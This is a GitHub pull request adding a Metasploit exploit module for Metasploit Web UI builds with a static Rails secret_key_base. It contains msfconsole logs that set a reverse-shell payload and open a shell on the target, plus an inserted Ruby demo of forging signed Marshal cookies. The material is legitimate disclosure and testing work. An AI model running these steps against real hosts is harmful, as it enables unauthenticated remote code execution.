add module metasploit_static_secret_key_base #7341

Conversation


@justinsteven justinsteven commented Sep 19, 2016

Exploits the issues detailed in:

Heavily based on exploits/multi/http/rails_secret_deserialization.

Verification

  • Install Metasploit Community, Express or Pro as a victim
  • Install a Weekly Release that has a static secret_key_base baked in (see the list in Targets)
  • Start msfconsole
  • use exploit/multi/http/metasploit_static_secret_key_base
  • Set 'RHOST', 'payload' and payload options
  • exploit
  • Verify it gets a shell

Sample

msf > use exploit/multi/http/metasploit_static_secret_key_base
msf exploit(metasploit_static_secret_key_base) > info

       Name: Metasploit Web UI Static secret_key_base Value
     Module: exploit/multi/http/metasploit_static_secret_key_base
   Platform: Ruby
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2016-09-15

Provided by:
  Justin Steven
  joernchen of Phenoelit <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      3790             yes       The target port
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The path to the Metasploit Web UI
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits the Web UI for Metasploit Community, Express
  and Pro where one of a certain set of Weekly Releases have been
  applied. These Weekly Releases introduced a static secret_key_base
  value. Knowledge of the static secret_key_base value allows for
  deserialization of a crafted Ruby Object, achieving code execution.
  This module is based on
  exploits/multi/http/rails_secret_deserialization

References:
  OVE (20160904-0002)
  https://community.rapid7.com/community/metasploit/blog/2016/09/15/important-security-fixes-in-metasploit-4120-2016091401
  https://github.com/justinsteven/advisories/blob/master/2016_metasploit_rce_static_key_deserialization.md

msf exploit(metasploit_static_secret_key_base) > show options

Module options (exploit/multi/http/metasploit_static_secret_key_base):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      3790             yes       The target port
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the Metasploit Web UI
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Metasploit 4.12.0-2016061501 to 4.12.0-2016083001


msf exploit(metasploit_static_secret_key_base) > set RHOST 172.18.0.2
RHOST => 172.18.0.2
msf exploit(metasploit_static_secret_key_base) > set PAYLOAD ruby/shell_reverse_tcp
PAYLOAD => ruby/shell_reverse_tcp
msf exploit(metasploit_static_secret_key_base) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(metasploit_static_secret_key_base) > set LPORT 4444
LPORT => 4444
msf exploit(metasploit_static_secret_key_base) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Checking for cookie _ui_session
[*] Searching for proper SECRET
[*] Sending cookie _ui_session
[*] Command shell session 1 opened (172.18.0.1:4444 -> 172.18.0.2:53368) at 2016-09-20 07:03:34 +1000

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

wvu commented Sep 20, 2016

Badass.

[
['Metasploit 4.12.0-2016061501 to 4.12.0-2016083001',
{
'RAILSVERSION' => 4, # The target Rails Version (use 3 for Rails3 and 2, 4 for Rails4)
@bcook-r7 bcook-r7 Sep 20, 2016

we probably don't need this configurability unless we're going to add more targets

@justinsteven (Contributor Author)

You're probably right. I tried to avoid changing the plumbing from rails_secret_deserialization to maintain parity (e.g. Leaving in the rails3 stuff as dead code) and wanted to avoid having magic values (e.g. The salt) inlined in the code. Should the dead code should be removed at the cost of parity? If the magic values don't belong in the target, should they be inlined in the code, or defined somewhere else?

Contributor

I think if you want parity, it follows that it should just extend the original module with this as a selectable target, rather than being introduced as a separate module. If this is going to be a separate module, ideally the common code moves to lib or a mixin.

Barring that, for a one-off, I'd optimize out the dead code. It's unlikely someone's going to update a working version-specific exploit just because a more generic exploit added a feature.

@justinsteven (Contributor Author)

I think if you want parity, it follows that it should just extend the original module with this as a selectable target, rather than being introduced as a separate module

I thought of that, but decided it'd inhibit discoverability

If this is going to be a separate module, ideally the common code moves to lib or a mixin.

Probably the way to go, especially if we keep cranking static secret_key_base modules out. OTOH these should die out with the Rails session cookie deserializer now defaulting to JSON.

I'd optimize out the dead code

Sounds good to me, I'll get on it

@acammack-r7 acammack-r7 self-assigned this Sep 20, 2016
* Inline magic values
* Optimise out dead Rails3-specific code
Replace errant \t with \x20
@justinsteven justinsteven force-pushed the add_module_metasploit_static_secret_key_base branch from 4a83fa3 to dcfbb9e Compare September 21, 2016 10:14
@pbarry-r7 pbarry-r7 self-assigned this Sep 23, 2016
@pbarry-r7

Verified with a Pro install which was upgraded to 4.12.0-2016081201:

$ ./msfconsole

                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v4.12.27-dev-dcfbb9e                 ]
+ -- --=[ 1580 exploits - 901 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/http/metasploit_static_secret_key_base
msf exploit(metasploit_static_secret_key_base) > show options

Module options (exploit/multi/http/metasploit_static_secret_key_base):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      3790             yes       The target port
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The path to the Metasploit Web UI
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(metasploit_static_secret_key_base) > set rhost 10.0.2.16
rhost => 10.0.2.16
msf exploit(metasploit_static_secret_key_base) > set payload ruby/shell_reverse_tcp
payload => ruby/shell_reverse_tcp
msf exploit(metasploit_static_secret_key_base) > set lhost 10.0.2.4
lhost => 10.0.2.4
msf exploit(metasploit_static_secret_key_base) > run

[*] Started reverse TCP handler on 10.0.2.4:4444 
[*] Checking for cookie _ui_session
[*] Searching for proper secret
[*] Found secret, detected version 4.12.0_2016081201
[*] Sending cookie _ui_session
[*] Command shell session 1 opened (10.0.2.4:4444 -> 10.0.2.16:51064) at 2016-09-23 09:11:49 -0500


ls  
CREDITS
README.md
Rakefile
app
bin
bower.json
conf
config
config.ru
db
doc
lib
licenses
log
metasploit-pro-ui.gemspec
public
script
scripts
tmp
vendor

pwd
/opt/metasploit/apps/pro/ui

Nice work, @justinsteven! I'll land this PR shortly...

@pbarry-r7 pbarry-r7 merged commit dcfbb9e into rapid7:master Sep 23, 2016
pbarry-r7 commented Sep 23, 2016

Release Notes

This module allows the user to exploit certain upgraded versions of Metasploit Community, Express, and Pro by forging a session cookie, allowing remote code execution. Upgrade versions of Metasploit Community, Express, and Pro 4.12.0-2016061501 through 4.12.0-2016083001 are vulnerable (full installs of these versions are not vulnerable, only the upgrades). Authentication is not required to exploit this vulnerability. See this blog post for more details: https://community.rapid7.com/community/metasploit/blog/2016/09/19/important-security-fixes-in-metasploit-4120-2016091401
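
The module description above and these release notes both come down to one mechanism: Rails 4 signs its session cookie with HMAC-SHA1 under a key derived (PBKDF2, salt "signed cookie") from secret_key_base, and the signed payload is Marshal-loaded on the server, so anyone who knows a static secret_key_base can mint a cookie that passes verification and instantiates objects of their choosing. What follows is an added example written for this page, not the module's code and not Rapid7's: it re-implements the Rails 4 signed-cookie scheme with the Ruby stdlib, mimics the module's "Searching for proper secret" step against constructed candidate secrets, and contrasts a harmless stand-in class with the JSON serializer mentioned earlier in the thread. The build names and secrets in CANDIDATE_SECRETS are constructed; the real static values are deliberately not reproduced.

```ruby
require 'openssl'
require 'base64'
require 'json'

# --- Rails 4 signed-cookie primitives, re-implemented with the stdlib -------
# ActiveSupport::KeyGenerator: PBKDF2-HMAC-SHA1, 1000 iterations, 64-byte key.
# The signed-cookie jar uses the literal salt "signed cookie".
def derive_cookie_key(secret_key_base, salt = 'signed cookie')
  OpenSSL::PKCS5.pbkdf2_hmac(secret_key_base, salt, 1000, 64, 'sha1')
end

def hmac_hex(key, data)
  OpenSSL::HMAC.hexdigest('SHA1', key, data)
end

# Constant-time comparison, as ActiveSupport::SecurityUtils.secure_compare does.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# MessageVerifier#generate: base64(serialized value) + "--" + hex(HMAC-SHA1).
def sign_cookie(value, secret_key_base, serializer: :marshal)
  blob = serializer == :marshal ? Marshal.dump(value) : JSON.generate(value)
  data = Base64.strict_encode64(blob)
  "#{data}--#{hmac_hex(derive_cookie_key(secret_key_base), data)}"
end

# MAC check only: true if this secret_key_base produced the cookie's signature.
def mac_valid?(cookie, secret_key_base)
  data, sig = cookie.split('--', 2)
  return false if data.nil? || sig.nil?
  secure_compare(hmac_hex(derive_cookie_key(secret_key_base), data), sig)
end

# MessageVerifier#verify as the server runs it: MAC first, then deserialize.
# With :marshal the holder of the secret chooses which class gets instantiated;
# with :json the payload can only become Hash/Array/scalars.
def verify_cookie(cookie, secret_key_base, serializer: :marshal)
  return nil unless mac_valid?(cookie, secret_key_base)
  blob = Base64.decode64(cookie.split('--', 2).first)
  serializer == :marshal ? Marshal.load(blob) : JSON.parse(blob)
end

# --- The module's "Searching for proper secret" step ------------------------
# CONSTRUCTED (build => secret) pairs for this demo; not the real static values.
CANDIDATE_SECRETS = {
  'example-build-A' => 'constructed-static-secret-A',
  'example-build-B' => 'constructed-static-secret-B'
}.freeze

# Given a cookie the server issued, return the build whose secret verifies it,
# or nil when none does (the module's "no vulnerable target" case).
def detect_version(cookie, candidates = CANDIDATE_SECRETS)
  hit = candidates.find { |_build, secret| mac_valid?(cookie, secret) }
  hit && hit.first
end

# --- Why a known secret plus Marshal means attacker-chosen code runs --------
# Harmless stand-in for a deserialization gadget: Marshal.load allocates whatever
# class the cookie names and calls its marshal_load before the app sees the
# session, so the method body below is the attacker's choice of code path.
class Canary
  @@loads = 0
  def self.loads
    @@loads
  end

  def marshal_dump
    'x'
  end

  def marshal_load(_data)
    @@loads += 1
  end
end

def demo
  static_secret = CANDIDATE_SECRETS['example-build-B']
  issued  = sign_cookie({ 'session_id' => 'abc' }, static_secret) # server-issued
  version = detect_version(issued)                                # which secret fits

  forged = sign_cookie(Canary.new, static_secret)                 # attacker mints it
  obj    = verify_cookie(forged, static_secret)                   # server accepts it

  # Mitigations: a unique per-install secret rejects the forgery outright ...
  rejected = verify_cookie(forged, 'per-install-random-secret')
  # ... and a JSON serializer keeps attacker data as data, never as objects.
  json_cookie = sign_cookie({ 'user_id' => 1 }, static_secret, serializer: :json)
  json_obj    = verify_cookie(json_cookie, static_secret, serializer: :json)

  { version: version, forged_class: obj.class, canary_loads: Canary.loads,
    rejected: rejected, json_class: json_obj.class }
end
```

Calling `demo` returns the detected build, the class the forged cookie turned into on the "server" (Canary), the count of marshal_load calls it triggered, nil for the cookie checked under a different secret, and Hash for the JSON-serialized variant. The example stops at forging; the real module still has to send the forged `_ui_session` cookie to the Web UI (port 3790 over SSL), which is deliberately not reproduced here.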

@bcook-r7

Thanks @pbarry-r7 !

@shipcod3

this is cool man
